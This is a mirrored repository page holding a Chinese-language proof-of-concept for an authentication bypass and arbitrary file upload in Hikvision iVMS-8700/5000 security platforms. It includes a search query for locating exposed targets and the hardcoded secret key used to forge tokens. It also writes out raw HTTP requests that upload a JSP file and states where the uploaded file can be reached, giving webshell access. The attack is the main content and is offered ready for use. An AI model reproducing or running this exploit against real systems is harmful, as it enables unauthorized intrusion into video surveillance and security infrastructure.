admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/海康威视/海康威视iVMS综合安防系统/海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

82 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞
# 一、漏洞简介
海康威视iVMS集中监控应用管理平台是以安全防范业务应用为导向以视频图像应用为基础手段综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统构建的多业务应用综合管理平台。攻击者通过获取密钥任意构造token请求/resourceOperations/upload接口任意上传文件导致获取服务器webshell权限同时可远程进行恶意代码执行。
# 二、影响版本
+ 海康威视综合安防系统iVMS-5000
+ 海康威视综合安防系统 iVMS-8700
# 三、资产测绘
+ hunter`web.body="/views/home/file/installPackage.rar"`
![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/kDLBwyHdk2d3W6A_/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-110733.png)
+ 登录页面:
![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/kDLBwyHdk2d3W6A_/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-046363.png)
# 四、漏洞复现
1. 访问`<font style="color:rgb(30, 107, 184);">/eps/api/resourceOperations/upload</font>`发现token需要进行鉴权
```plain
POST /eps/api/resourceOperations/upload HTTP/1.1
Host: xx.xx.xx.xx
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryGEJwjlojPo
Cache-Control:max-age=0
Connection:close
Content-Length: 52
service=http://xx.xx.xx.xx/home/index.action
```
![1691851435344-ed7479f5-f1be-43e6-aa67-2b85e942d1fa.png](./img/kDLBwyHdk2d3W6A_/1691851435344-ed7479f5-f1be-43e6-aa67-2b85e942d1fa-589948.png)
2. 构造token绕过认证内部机制如果token值与请求url+secretkey的md5值相同就可以绕过认证
secretkey是代码里写死的默认值secretKeyIbuilding
token值需要进行MD5加密32位大写
组合token=MD5(url+"secretKeyIbuilding")
```plain
http://xx.xx.xx.xx/eps/api/resourceOperations/uploadsecretKeyIbuilding
```
![1691851562964-59ab6b79-59b0-4427-aa22-0724519c2287.png](./img/kDLBwyHdk2d3W6A_/1691851562964-59ab6b79-59b0-4427-aa22-0724519c2287-296469.png)
3. 构造上传文件,上传成功且返回了resourceUuid值
```plain
POST /eps/api/resourceOperations/upload?token=DFB0D4034A82263A4DA9A37EB0DA687B HTTP/1.1
Host: xx.xx.xx.xx
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryGEJwjlojPo
Cache-Control:max-age=0
Connection:close
Content-Length: 178
------WebKitFormBoundaryGEJwjlojPo
Content-Disposition: form-data;name="fileUploader"; filename="test.jsp"
Content-Type: image/jpeg
1
------WebKitFormBoundaryGEJwjlojPo--
```
![1691851646699-a986ea3a-d25a-45cb-bf5a-d639f1702215.png](./img/kDLBwyHdk2d3W6A_/1691851646699-a986ea3a-d25a-45cb-bf5a-d639f1702215-549185.png)
4. 上传文件位置
```plain
http://xx.xx.xx.xx/eps/upload/resourceUuid的值.jsp
```
![1691851724492-57942c68-7154-45c5-b964-1cfb0b1fcb13.png](./img/kDLBwyHdk2d3W6A_/1691851724492-57942c68-7154-45c5-b964-1cfb0b1fcb13-384332.png)
> 更新: 2024-02-29 23:57:17
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dxm9gap6g8zry92h>
Reference in New Issue View Git Blame Copy Permalink